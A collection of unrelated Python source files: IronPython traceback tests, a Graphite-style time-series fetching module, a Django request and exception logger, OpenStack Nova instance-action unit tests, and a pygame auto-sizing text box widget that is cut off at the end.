try:
import foo
foo.another_raise()
except:
assert_traceback([(LINE250 + 8, 0, FILE, 'test_throw_in_another_file'), (3, 0, _f_file.lower(), 'another_raise')])
finally:
nt.remove(_f_file)
class MyException(Exception): pass
Line260 = 250
def catch_MyException():
try:
_raise_exception()
except MyException:
        assert_traceback([]) # UNREACHABLE. THIS TRICK SIMPLIFIES THE CHECK
def test_catch_MyException():
try:
catch_MyException()
except:
assert_traceback([(Line260+8, 0, FILE, 'test_catch_MyException'), (Line260+2, 0, FILE, 'catch_MyException'), _retb])
Line263 = 263
@skip("silverlight")
def test_cp11923_first():
try:
_t_test = testpath.public_testdir + "\\cp11923.py"
write_to_file(_t_test, """def f():
x = 'something bad'
raise Exception(x)""")
import cp11923
for i in range(3):
try:
cp11923.f()
except:
assert_traceback([(Line263 + 11, 69, 'test_traceback.py', 'test_cp11923_first'), (3, 22, get_full_dir_name(_t_test).lower(), 'f')])
imp.reload(cp11923)
finally:
import nt
nt.unlink(_t_test)
###############################################################################
##TESTS BEYOND THIS POINT SHOULD NOT DEPEND ON LINE NUMBERS IN THIS FILE#######
###############################################################################
@skip("silverlight")
def test_cp11923_second():
import nt
import sys
old_path = [x for x in sys.path]
sys.path.append(nt.getcwd())
try:
#Test setup
_t_test = testpath.public_testdir + "\\cp11116_main.py"
write_to_file(_t_test, """import cp11116_a
try:
cp11116_a.a()
except:
pass
cp11116_a.a()
""")
_t_test_a = testpath.public_testdir + "\\cp11116_a.py"
write_to_file(_t_test_a, """def a():
raise None
""")
#Actual test
t_out, t_in, t_err = nt.popen3(sys.executable + " " + nt.getcwd() + r"\cp11116_main.py")
lines = t_err.readlines()
t_err.close()
t_out.close()
t_in.close()
#Verification
Assert("cp11116_main.py\", line 7, in" in lines[1], lines[1])
line_num = 3
if is_cli:
line_num -= 1
Assert(lines[line_num].rstrip().endswith("cp11116_a.py\", line 2, in a"), lines[line_num])
finally:
sys.path = old_path
nt.unlink(_t_test)
nt.unlink(_t_test_a)
Line331 = 332
def test_reraise():
def g():
f()
def f():
try:
raise Exception
except:
raise
try:
g()
except:
assert_traceback([(Line331+9, 0, 'test_traceback.py', 'test_reraise'), (Line331, 0, 'test_traceback.py', 'g'), (Line331+4, 0, 'test_traceback.py', 'f')])
def test_reraise_finally():
def g():
f()
def f():
try:
raise Exception
finally:
raise
try:
g()
except:
assert_traceback([(Line331+25, 30, 'test_traceback.py', 'test_reraise_finally'), (Line331+16, 3, 'test_traceback.py', 'g'), (Line331+22,13, 'test_traceback.py', 'f')])
Line361 = 361
def test_xafter_finally_raise():
def g():
raise Exception
def nop(): pass
def f():
try:
nop()
finally:
nop()
try:
g()
except Exception as e:
assert_traceback([(Line361+14, 30, 'test_traceback.py', 'f'), (Line361+3, 3, 'test_traceback.py', 'g')])
f()
Line381 = 381
def test_uncaught_exception_thru_try():
def baz():
raise StopIteration
def f():
try:
baz()
except TypeError:
pass
try:
f()
except:
assert_traceback([(Line381+11, 30, 'test_traceback.py', 'test_uncaught_exception_thru_try'), (Line381+7, 3, 'test_traceback.py', 'f'), (Line381+3, 3, 'test_traceback.py', 'baz')])
Line397=397
def test_with_traceback():
from _thread import allocate_lock
def f():
g()
def g():
h()
def h():
raise Exception('hello!!')
try:
with allocate_lock():
f()
except:
assert_traceback([(Line397+14, 30, 'test_traceback.py', 'test_with_traceback'),
(Line397+4, 3, 'test_traceback.py', 'f'),
(Line397+7, 3, 'test_traceback.py', 'g'),
(Line397+10, 3, 'test_traceback.py', 'h')])
Line419=419
def test_xraise_again():
def f():
g()
def g():
h()
def h():
raise Exception('hello!!')
try:
try:
f()
except Exception as e:
raise e
except:
assert_traceback([(Line419+15, 30, 'test_traceback.py', 'test_xraise_again'), ])
Line438=438
def test_with_traceback_enter_throws():
class ctx_mgr(object):
def __enter__(*args):
raise Exception('hello')
def __exit__(*args):
pass
def h():
raise Exception('hello!!')
try:
with ctx_mgr():
h()
except:
assert_traceback([(Line438+13, 30, 'test_traceback.py', 'test_with_traceback_enter_throws'),
(Line438+4, 3, 'test_traceback.py', '__enter__')])
Line457=457
def test_with_traceback_exit_throws():
class ctx_mgr(object):
def __enter__(*args):
pass
def __exit__(*args):
raise Exception('hello')
def h():
raise Exception('hello!!')
try:
with ctx_mgr():
h()
except:
assert_traceback([(Line457+13, 30, 'test_traceback.py', 'test_with_traceback_exit_throws'),
(Line457+6, 3, 'test_traceback.py', '__exit__')])
Line475=475
def test_with_traceback_ctor_throws():
class ctx_mgr(object):
def __init__(self):
raise Exception('hello')
def __enter__(*args):
pass
def __exit__(*args):
pass
def h():
raise Exception('hello!!')
try:
with ctx_mgr():
h()
except:
assert_traceback([(Line475+14, 30, 'test_traceback.py', 'test_with_traceback_ctor_throws'),
(Line475+4, 3, 'test_traceback.py', '__init__')])
Line496=496
def test_with_mixed_stack():
"""tests a stack which is mixed w/ interpreted and non-interpreted frames
because f() has a loop in it"""
def a():
with xxx() as abc:
f()
def f():
for z in ():
pass
1/0
class xxx(object):
def __enter__(*args): pass
def __exit__(*args): pass
try:
a()
except:
assert_traceback([(Line496+19, 30, 'test_traceback.py', 'test_with_mixed_stack'),
(Line496+6, 3, 'test_traceback.py', 'a'),
(Line496+12, 3, 'test_traceback.py', 'f')])
run_test(__name__)
|
|
"""Copyright 2008 Orbitz WorldWide
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
from collections import defaultdict
from structlog import get_logger
from ..utils import epoch
logger = get_logger()
class TimeSeries(list):
def __init__(self, name, start, end, step, values, consolidate='average'):
list.__init__(self, values)
self.name = name
self.start = start
self.end = end
self.step = step
self.consolidationFunc = consolidate
self.valuesPerPoint = 1
self.options = {}
self.pathExpression = name
def __eq__(self, other):
if isinstance(other, TimeSeries):
color_eq = True
if hasattr(self, 'color'):
if hasattr(other, 'color'):
color_eq = (self.color == other.color)
else:
color_eq = False
elif hasattr(other, 'color'):
color_eq = False
return ((self.name, self.start, self.step, self.consolidationFunc,
self.valuesPerPoint, self.options) ==
(other.name, other.start, other.step,
other.consolidationFunc, other.valuesPerPoint,
other.options)) and list.__eq__(self, other) and color_eq
return False
def __iter__(self):
if self.valuesPerPoint > 1:
return self.__consolidatingGenerator(list.__iter__(self))
else:
return list.__iter__(self)
def consolidate(self, valuesPerPoint):
self.valuesPerPoint = int(valuesPerPoint)
def __consolidatingGenerator(self, gen):
buf = []
for x in gen:
buf.append(x)
if len(buf) == self.valuesPerPoint:
while None in buf:
buf.remove(None)
if buf:
yield self.__consolidate(buf)
buf = []
else:
yield None
while None in buf:
buf.remove(None)
if buf:
yield self.__consolidate(buf)
else:
yield None
return
def __consolidate(self, values):
usable = [v for v in values if v is not None]
if not usable:
return None
if self.consolidationFunc == 'sum':
return sum(usable)
if self.consolidationFunc == 'average':
return float(sum(usable)) / len(usable)
if self.consolidationFunc == 'max':
return max(usable)
if self.consolidationFunc == 'min':
return min(usable)
raise Exception(
"Invalid consolidation function: '%s'" % self.consolidationFunc)
def __repr__(self):
return 'TimeSeries(name=%s, start=%s, end=%s, step=%s)' % (
self.name, self.start, self.end, self.step)
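# Illustrative example (not part of the original module): consolidating in
# pairs averages adjacent points and skips None values within each bucket.
#
#   ts = TimeSeries('example.metric', 0, 60, 10, [1, 3, None, 5, 7, 9])
#   ts.consolidate(2)
#   list(ts)  # -> [2.0, 5.0, 8.0] with the default 'average' function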
class DataStore(object):
"""
Simple object to store results of multi fetches.
Also aids in looking up data by pathExpressions.
"""
def __init__(self):
self.paths = defaultdict(set)
self.data = defaultdict(list)
def get_paths(self, path_expr):
"""
Returns all paths found for path_expr
"""
return sorted(self.paths[path_expr])
def add_data(self, path, time_info, data, exprs):
"""
Stores data before it can be put into a time series
"""
        # Don't add if empty
if not nonempty(data):
for d in self.data[path]:
if nonempty(d['values']):
return
# Add data to path
for expr in exprs:
self.paths[expr].add(path)
self.data[path].append({
'time_info': time_info,
'values': data
})
def get_series_list(self, path_expr):
series_list = []
for path in self.get_paths(path_expr):
for data in self.data.get(path):
start, end, step = data['time_info']
series = TimeSeries(path, start, end, step, data['values'])
series.pathExpression = path_expr
series_list.append(series)
return series_list
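# Illustrative sketch (paths and values assumed):
#
#   ds = DataStore()
#   ds.add_data('servers.web1.cpu', (0, 60, 10), [1, 2, 3, 4, 5, 6], ['servers.*.cpu'])
#   ds.get_paths('servers.*.cpu')        # -> ['servers.web1.cpu']
#   ds.get_series_list('servers.*.cpu')  # -> [TimeSeries(...)] tagged with the path expression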
def fetchData(requestContext, pathExprs):
from ..app import app
startTime = int(epoch(requestContext['startTime']))
endTime = int(epoch(requestContext['endTime']))
if 'now' in requestContext:
now = int(epoch(requestContext['now']))
else:
now = None
# Convert to list if given single path
if not isinstance(pathExprs, list):
pathExprs = [pathExprs]
data_store = DataStore()
multi_nodes = defaultdict(list)
single_nodes = []
path_to_exprs = defaultdict(list)
# Group nodes that support multiple fetches
for pathExpr in pathExprs:
for node in app.store.find(pathExpr, startTime, endTime):
if not node.is_leaf:
continue
if node.path not in path_to_exprs:
if hasattr(node, '__fetch_multi__'):
multi_nodes[node.__fetch_multi__].append(node)
else:
single_nodes.append(node)
path_to_exprs[node.path].append(pathExpr)
# Multi fetches
for finder in app.store.finders:
if not hasattr(finder, '__fetch_multi__'):
continue
nodes = multi_nodes[finder.__fetch_multi__]
if not nodes:
continue
try:
time_info, series = finder.fetch_multi(nodes, startTime, endTime,
now, requestContext)
except TypeError:
time_info, series = finder.fetch_multi(nodes, startTime, endTime)
for path, values in series.items():
data_store.add_data(path, time_info, values,
path_to_exprs[path])
# Single fetches
fetches = [
(node.path, node.fetch(startTime, endTime, now, requestContext))
for node in single_nodes
]
for path, results in fetches:
if not results:
logger.info("no results", path=path, start=startTime,
end=endTime)
continue
try:
time_info, values = results
except ValueError as e:
raise Exception("could not parse timeInfo/values from metric "
"'%s': %s" % (path, e))
data_store.add_data(path, time_info, values, path_to_exprs[path])
return data_store
def nonempty(series):
for value in series:
if value is not None:
return True
return False
|
|
import traceback
import json
import requests
from .models import (
Log,
RequestLog,
EventLog,
)
class NoRequestException(Exception):
pass
class NoExceptionException(Exception):
pass
class ObjectLogger(object):
def log_request(self, log=None, request=None, request_body=None):
# -- General info
log.request_url = request.get_full_path()
log.request_method = request.method
log.get_data = json.dumps(request.GET)
log.request_body = request_body
log.cookies = json.dumps(request.COOKIES)
# --- Request meta info
log.meta = ','.join('"%s": "%s"' % (k, str(v)) for k, v in list(request.META.items()))
log.meta = '{%s}' % log.meta
log.meta = log.meta.replace('\\', '|')
# --- User info
if request.user and request.user.is_authenticated:
log.user_id = request.user.id
log.user_name = request.user.email
# --- User agent info
user_agent = request.user_agent
# Browser
log.request_browser = user_agent.browser
# OS
log.request_os = user_agent.os
# Device
log.request_device = user_agent.device
# Device type
log.is_mobile = user_agent.is_mobile
log.is_tablet = user_agent.is_tablet
log.is_touch_capable = user_agent.is_touch_capable
log.is_pc = user_agent.is_pc
log.is_bot = user_agent.is_bot
return log
def log_response(self, log, data, status=None, template_name=None, headers=None, content_type=None):
log.response_body = json.dumps(data)
log.response_status = status if status else 'None'
log.response_headers = json.dumps(headers)
log.response_content_type = content_type if content_type else 'None'
return log
def log_exception(self, log=None, exception=None):
# --- Exception info
log.exception_type = type(exception).__name__
log.message = str(exception)
log.stack_trace = traceback.format_exc()
return log
class Logger(object):
@staticmethod
def log_error(request=None, request_body=None, exception=None):
if request and exception:
log = Log(
log_level=Log.ERROR)
obj_logger = ObjectLogger()
log = obj_logger.log_exception(log, exception)
log = obj_logger.log_request(log, request, request_body)
# --- Save
log.save()
elif request is None:
raise NoRequestException('No http request found')
elif exception is None:
raise NoExceptionException('No exception found')
return log
@staticmethod
def log_debug(request=None, message=None):
stack_trace = ''.join(line for line in traceback.format_stack())
message = message if message else ""
if request:
# -- General info
log = Log(
log_level=Log.DEBUG,
message=message,
stack_trace=stack_trace)
obj_logger = ObjectLogger()
log = obj_logger.log_request(log, request, request.body)
# --- Save
log.save()
return log
else:
raise NoRequestException('No http request found')
@staticmethod
def log_warn(request=None, message=None):
stack_trace = ''.join(line for line in traceback.format_stack())
message = message if message else ""
if request:
# -- General info
log = Log(
log_level=Log.WARN,
message=message,
stack_trace=stack_trace)
obj_logger = ObjectLogger()
log = obj_logger.log_request(log, request, request.body)
# --- Save
log.save()
return log
else:
raise NoRequestException('No http request found')
@staticmethod
def log_info(request=None, message=None):
stack_trace = ''.join(line for line in traceback.format_stack())
message = message if message else ""
if request:
# -- General info
log = Log(
log_level=Log.INFO,
message=message,
stack_trace=stack_trace)
obj_logger = ObjectLogger()
log = obj_logger.log_request(log, request, request.body)
# --- Save
log.save()
return log
else:
raise NoRequestException('No http request found')
@staticmethod
def non_request_log(log_level=None, message=None):
stack_trace = ''.join(line for line in traceback.format_stack())
message = message if message else ""
# -- General info
log = Log(
log_level=log_level if log_level else Log.INFO,
message=message,
stack_trace=stack_trace)
# --- Save
log.save()
return log
class RequestObjectLogger(object):
def log_request(self, log, request, data):
# --- Request data
log.method = request.method
log.url = request.url
log.request_data = data if isinstance(data, str) else json.dumps(data)
headers = {val[0]: val[1] for val in list(request.headers.items())}
log.request_headers = json.dumps(headers)
return log
def log_response(self, log, response, user, message):
# --- Response data
log.response_text = response.text
log.response_status = response.status_code
log.response_reason = response.reason
        log.response_time = response.elapsed.total_seconds() * 1000
# --- User data
if user:
if user.is_authenticated:
log.user_id = user.id
log.user_name = user.email
log.message = message if message else ''
return log
class RequestLogger(object):
@staticmethod
def get(url, params=None, user=None, message=None, **kwargs):
response = requests.get(url, params=params, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, params)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
@staticmethod
def post(url, data=None, json=None, user=None, message=None, **kwargs):
        response = requests.post(url, data=data, json=json, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, data)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
@staticmethod
def put(url, data=None, json=None, user=None, message=None, **kwargs):
        response = requests.put(url, data=data, json=json, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, data)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
@staticmethod
def delete(url, user=None, message=None, **kwargs):
response = requests.delete(url, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, None)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
@staticmethod
def patch(url, data=None, json=None, user=None, message=None, **kwargs):
        response = requests.patch(url, data=data, json=json, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, data)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
@staticmethod
def head(url, user=None, message=None, **kwargs):
response = requests.head(url, **kwargs)
log = RequestLog()
obj_logger = RequestObjectLogger()
log = obj_logger.log_request(log, response.request, None)
log = obj_logger.log_response(log, response, user, message)
# --- Save
log.save()
return response
class EventLogger(object):
@staticmethod
def _log_event(log_level, message, tag=''):
stack_trace = ''.join(line for line in traceback.format_stack())
log = EventLog(
log_level=log_level,
message=message,
stack_trace=stack_trace,
tag=tag)
log.save()
@staticmethod
def log_error(message, tag=''):
EventLogger._log_event(
log_level=EventLog.ERROR,
message=message,
tag=tag)
@staticmethod
def log_debug(message, tag=''):
EventLogger._log_event(
log_level=EventLog.DEBUG,
message=message,
tag=tag)
@staticmethod
def log_warn(message, tag=''):
EventLogger._log_event(
log_level=EventLog.WARN,
message=message,
tag=tag)
@staticmethod
def log_info(message, tag=''):
EventLogger._log_event(
log_level=EventLog.INFO,
message=message,
tag=tag)
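# Illustrative usage sketch (call sites assumed, not part of the original module):
#
#   try:
#       handle(request)
#   except Exception as exc:
#       Logger.log_error(request=request, request_body=request.body, exception=exc)
#
#   RequestLogger.get('https://api.example.com/items', user=request.user,
#                     message='fetch items')          # response is returned, the call is logged
#   EventLogger.log_info('cache warmed', tag='startup')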
|
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.compute import utils as compute_utils
from nova import db
from nova.objects import instance_action
from nova.openstack.common import timeutils
from nova.tests.objects import test_objects
NOW = timeutils.utcnow()
fake_action = {
'created_at': NOW,
'deleted_at': None,
'updated_at': None,
'deleted': False,
'id': 123,
'action': 'fake-action',
'instance_uuid': 'fake-uuid',
'request_id': 'fake-request',
'user_id': 'fake-user',
'project_id': 'fake-project',
'start_time': NOW,
'finish_time': None,
'message': 'foo',
}
fake_event = {
'created_at': NOW,
'deleted_at': None,
'updated_at': None,
'deleted': False,
'id': 123,
'event': 'fake-event',
'action_id': 123,
'start_time': NOW,
'finish_time': None,
'result': 'fake-result',
'traceback': 'fake-tb',
}
class _TestInstanceActionObject(object):
def test_get_by_request_id(self):
self.mox.StubOutWithMock(db, 'action_get_by_request_id')
db.action_get_by_request_id(self.context, 'fake-uuid', 'fake-request'
).AndReturn(fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.get_by_request_id(
self.context, 'fake-uuid', 'fake-request')
self.assertEqual(fake_action['id'], action.id)
def test_action_start(self):
self.mox.StubOutWithMock(db, 'action_start')
db.action_start(self.context, compute_utils.pack_action_start(
self.context, 'fake-uuid', 'fake-action')).AndReturn(
fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.action_start(
self.context, 'fake-uuid', 'fake-action')
self.assertEqual(fake_action['id'], action.id)
def test_action_start_no_result(self):
self.mox.StubOutWithMock(db, 'action_start')
db.action_start(self.context, compute_utils.pack_action_start(
self.context, 'fake-uuid', 'fake-action')).AndReturn(
fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.action_start(
self.context, 'fake-uuid', 'fake-action', want_result=False)
self.assertEqual(None, action)
def test_action_finish(self):
timeutils.set_time_override()
self.mox.StubOutWithMock(db, 'action_finish')
db.action_finish(self.context, compute_utils.pack_action_finish(
self.context, 'fake-uuid')).AndReturn(fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.action_finish(
self.context, 'fake-uuid', want_result=True)
self.assertEqual(fake_action['id'], action.id)
def test_action_finish_no_result(self):
timeutils.set_time_override()
self.mox.StubOutWithMock(db, 'action_finish')
db.action_finish(self.context, compute_utils.pack_action_finish(
self.context, 'fake-uuid')).AndReturn(fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.action_finish(
self.context, 'fake-uuid', want_result=False)
self.assertEqual(None, action)
def test_finish(self):
timeutils.set_time_override()
self.mox.StubOutWithMock(db, 'action_start')
self.mox.StubOutWithMock(db, 'action_finish')
db.action_start(self.context, compute_utils.pack_action_start(
self.context, 'fake-uuid', 'fake-action')).AndReturn(
fake_action)
db.action_finish(self.context, compute_utils.pack_action_finish(
self.context, 'fake-uuid')).AndReturn(fake_action)
self.mox.ReplayAll()
action = instance_action.InstanceAction.action_start(
self.context, 'fake-uuid', 'fake-action')
action.finish()
def test_get_list(self):
timeutils.set_time_override()
self.mox.StubOutWithMock(db, 'actions_get')
actions = [dict(fake_action, id=1234),
dict(fake_action, id=5678)]
db.actions_get(self.context, 'fake-uuid').AndReturn(actions)
self.mox.ReplayAll()
action_list = instance_action.InstanceActionList.get_by_instance_uuid(
self.context, 'fake-uuid')
self.assertEqual(2, len(action_list))
for index, action in enumerate(action_list):
self.assertEqual(actions[index]['id'], action.id)
class TestInstanceActionObject(test_objects._LocalTest,
_TestInstanceActionObject):
pass
class TestRemoteInstanceActionObject(test_objects._RemoteTest,
_TestInstanceActionObject):
pass
class _TestInstanceActionEventObject(object):
def test_get_by_id(self):
self.mox.StubOutWithMock(db, 'action_event_get_by_id')
db.action_event_get_by_id(self.context, 'fake-id').AndReturn(
fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.get_by_id(self.context,
'fake-id')
self.assertEqual(fake_event['id'], event.id)
def test_event_start(self):
self.mox.StubOutWithMock(db, 'action_event_start')
db.action_event_start(
self.context,
compute_utils.pack_action_event_start(
self.context, 'fake-uuid', 'fake-event')).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_start(self.context,
'fake-uuid',
'fake-event')
self.assertEqual(fake_event['id'], event.id)
def test_event_start_no_result(self):
self.mox.StubOutWithMock(db, 'action_event_start')
db.action_event_start(
self.context,
compute_utils.pack_action_event_start(
                self.context, 'fake-uuid', 'fake-event')).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_start(
self.context, 'fake-uuid', 'fake-event', want_result=False)
self.assertEqual(None, event)
def test_event_finish(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
        db.action_event_finish(
self.context,
compute_utils.pack_action_event_finish(
self.context, 'fake-uuid', 'fake-event', exc_val=None,
exc_tb=None)).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_finish(self.context,
'fake-uuid',
'fake-event')
self.assertEqual(fake_event['id'], event.id)
def test_event_finish_no_result(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
        db.action_event_finish(
self.context,
compute_utils.pack_action_event_finish(
self.context, 'fake-uuid', 'fake-event', exc_val=None,
exc_tb=None)).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_finish(
self.context, 'fake-uuid', 'fake-event', want_result=False)
self.assertEqual(None, event)
def test_event_finish_with_failure(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
        db.action_event_finish(
self.context,
compute_utils.pack_action_event_finish(
self.context, 'fake-uuid', 'fake-event', exc_val='fake-exc',
exc_tb='fake-tb')).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_finish_with_failure(
self.context, 'fake-uuid', 'fake-event', 'fake-exc', 'fake-tb')
self.assertEqual(fake_event['id'], event.id)
def test_finish(self):
        self.mox.StubOutWithMock(db, 'action_event_start')
        self.mox.StubOutWithMock(db, 'action_event_finish')
db.action_event_start(
self.context,
compute_utils.pack_action_event_start(
self.context, 'fake-uuid', 'fake-event')).AndReturn(fake_event)
db.action_event_finish(
self.context,
compute_utils.pack_action_event_finish(
self.context, 'fake-uuid', 'fake-event', exc_val=None,
exc_tb=None)).AndReturn(fake_event)
self.mox.ReplayAll()
event = instance_action.InstanceActionEvent.event_start(
self.context, 'fake-uuid', 'fake-event')
event.finish()
def test_get_by_action(self):
self.mox.StubOutWithMock(db, 'action_events_get')
events = [dict(fake_event, id=1234),
dict(fake_event, id=5678)]
db.action_events_get(self.context, 'fake-action').AndReturn(events)
self.mox.ReplayAll()
event_list = instance_action.InstanceActionEventList.get_by_action(
self.context, 'fake-action')
self.assertEqual(2, len(event_list))
for index, event in enumerate(event_list):
self.assertEqual(events[index]['id'], event.id)
|
|
import pygame
all_sprites = pygame.sprite.Group()
class BaseWidget(pygame.sprite.Sprite):
def __init__(self, pos=(0, 0), size=(0, 0)):
super(BaseWidget, self).__init__()
self._rect = pygame.Rect(pos, size)
self._image = pygame.Surface(self._rect.size)
self.should_update = True
all_sprites.add(self)
@property
def rect(self):
return self._rect
@property
def image(self):
return self._image
def move_to(self, *pos):
setattr(self._rect, 'topleft', pos)
def move(self, *pos):
self._rect.move_ip(*pos)
def resize_to(self, *size):
self._rect.size = size
self._image = pygame.transform.scale(self._image, size)
def resize(self, *size):
        self._rect.inflate_ip(*size)
self._image = pygame.transform.scale(self._image, self._rect.size)
def unfocus(self):
pass
class TextBox(BaseWidget):
ATTRIBUTES = [
'anchor', 'background_color', 'border_color', 'border_size', 'font_name', 'font_size', 'image', 'padding',
'rect', 'text', 'text_color', 'wrap'
]
def __init__(
self, pos=(0, 0), size=(0, 0), text='', font_name='Arial', text_color=pygame.Color('black'),
anchor='topleft', padding=(0, 0), background_color=pygame.Color('white'), border_color=pygame.Color('grey'),
border_size=3, wrap=True
) -> None:
super().__init__(pos=pos, size=size)
# Colors.
self._text_color = text_color
self._background_color = background_color
self._border_color = border_color
# Text options.
self._anchor = anchor
self._padding = padding
self._wrap = wrap
# Pass.
self._border_size = border_size # In pixels.
self._text = text
self._font_name = font_name
# Dependent data.
self._text_area = self._image.get_rect(
size=(size[0] - border_size - padding[0] * 2, size[1] - border_size - padding[1] * 2),
)
self._text_area.center = self._image.get_rect().center
if text:
self._font_size, self._text_surface = self.get_text_surface_and_font_size()
self._font = pygame.font.SysFont(font_name, self._font_size)
else:
self._font_size = 256
self._font = pygame.font.SysFont(font_name, self._font_size)
self._text_surface = pygame.Surface((0, 0))
self._image.fill(background_color)
pygame.draw.rect(self._image, self._border_color, self._image.get_rect(), self._border_size)
self._image.blit(self._text_surface, self._text_area)
@property
def border_size(self):
return self._border_size
@border_size.setter
def border_size(self, value):
self._border_size = value
self.should_update = True
@property
def text(self):
return self._text
@text.setter
def text(self, value):
self._text = value
self.should_update = True
@property
def font_name(self):
return self._font_name
@font_name.setter
def font_name(self, value):
self._font_name = value
self.should_update = True
@property
def font_size(self):
return self._font_size
@font_size.setter
def font_size(self, value):
self._font_size = value
self.should_update = True
@property
def text_color(self):
return self._text_color
@text_color.setter
def text_color(self, value):
self._text_color = value
self.should_update = True
@property
def background_color(self):
return self._background_color
@background_color.setter
def background_color(self, background_color):
self._background_color = background_color
self._image.fill(background_color)
pygame.draw.rect(self._image, self._border_color, self._image.get_rect(), self._border_size)
self._image.blit(self._text_surface, self._text_area)
@property
def border_color(self):
return self._border_color
@border_color.setter
def border_color(self, border_color):
self._border_color = border_color
self._image.fill(self._background_color)
pygame.draw.rect(self._image, border_color, self._image.get_rect(), self._border_size)
self._image.blit(self._text_surface, self._text_area)
@property
def anchor(self):
return self._anchor
@anchor.setter
def anchor(self, value):
self._anchor = value
self.should_update = True
@property
def padding(self):
return self._padding
@padding.setter
def padding(self, value):
self._padding = value
self.should_update = True
def get_text_surface_and_font_size(self, font_size=256):
size = self._text_area.size
font_name = self._font_name
font_color = self._text_color
bg_color = self._background_color
wrap = self._wrap
text_array = [word.split() for word in self._text.splitlines()]
SysFont = pygame.font.SysFont
rows = len(text_array)
appendable_rows = []
width, height = size
lower, upper = 0, font_size
found = False
while not found:
font = SysFont(font_name, font_size)
font_sizes = tuple(font.size(' '.join(row)) for row in text_array) # Font size (width, height) of each row.
text_width = max(size[0] for size in font_sizes)
text_height = font_sizes[0][1] * rows
if wrap:
# The surface cannot fit an exact font size so we'll return the lower of the two.
if upper - lower <= 1:
found = True
                # Width exceeds but the height will fit one extra row.
elif text_width > width and text_height + text_height // rows <= height:
for row, x in enumerate(font_sizes):
if x[0] == text_width:
if len(text_array[row]) > 1:
if row + 1 in appendable_rows:
word = text_array[row].pop()
text_array[row + 1].insert(0, word)
else:
word = text_array[row].pop()
text_array.insert(row + 1, [word])
appendable_rows.append(row + 1)
rows += 1
else:
upper = font_size
font_size = (lower + upper) // 2
break
elif text_width > width or text_height > height:
upper = font_size
font_size = (lower + upper) // 2
elif text_width < width and text_height < height:
lower = font_size
font_size = (lower + upper) // 2
else:
found = True
else:
# The surface cannot fit an exact font size so we'll return the lower of the two.
if font_size == lower or font_size == upper:
found = True
elif text_width < width and text_height < height:
lower = font_size
font_size = (lower + upper) // 2
elif text_width > width or text_height > height:
upper = font_size
font_size = (lower + upper) // 2
else:
found = True
return_surface = pygame.Surface(size)
return_surface.fill(bg_color)
h = height // rows
for row, text_row in enumerate(text_array):
sub_surface = pygame.font.SysFont(font_name, lower).render(' '.join(text_row), 1, font_color)
rect = self._text_area.copy()
rect.height = h
rect.topleft = (0, h * row)
pos = sub_surface.get_rect()
setattr(pos, self._anchor, getattr(rect, self._anchor))
return_surface.blit(sub_surface, pos)
return lower, return_surface
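    # Note on the loop above: it binary-searches font sizes between `lower` and
    # `upper`; when wrapping is enabled and only the width overflows, the widest
    # row donates its last word to the next row instead of shrinking the font,
    # so `lower` ends up as the largest size that still fits and is what gets
    # rendered.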
# def _update_text_area(self):
# text_array = [word.split() for word in self._text.splitlines()]
# rows = len(text_array)
# height = self._text_area.height
#
# h = height // rows
# for row, text_row in enumerate(text_array):
# sub_surface = self._font.render(' '.join(text_row), 1, self._text_color)
# rect = self._text_area.copy()
# rect.height = h
# rect.topleft = (0, h * row)
# pos = sub_surface.get_rect()
# setattr(pos, self._anchor, getattr(rect, self._anchor))
# self._text_surface.blit(sub_surface, pos)
# self._image.blit(self._text_surface, self._text_area)
def update(self):
if self.should_update:
# update_whole_image
self._text_area = self._image.get_rect(
size=(self._rect.size[0] - self._border_size - self._padding[0] * 2,
self._rect.size[1] - self._border_size - self._padding[1] * 2)
)
self._text_area.center = self._image.get_rect().center
if self._text:
self._font_size, self._text_surface = self.get_text_surface_and_font_size()
self._font = pygame.font.SysFont(self._font_name, self._font_size)
else:
self._font_size = 1
self._font = pygame.font.SysFont(self._font_name, self._font_size)
self._text_surface = pygame.Surface((0, 0))
self._image.fill(self._background_color)
pygame.draw.rect(self._image, self._border_color, self._image.get_rect(), self._border_size)
self._image.blit(self._text_surface, self._text_area)
self.should_update = False
def __repr__(self):
attributes = sorted(self.ATTRIBUTES)
values = []
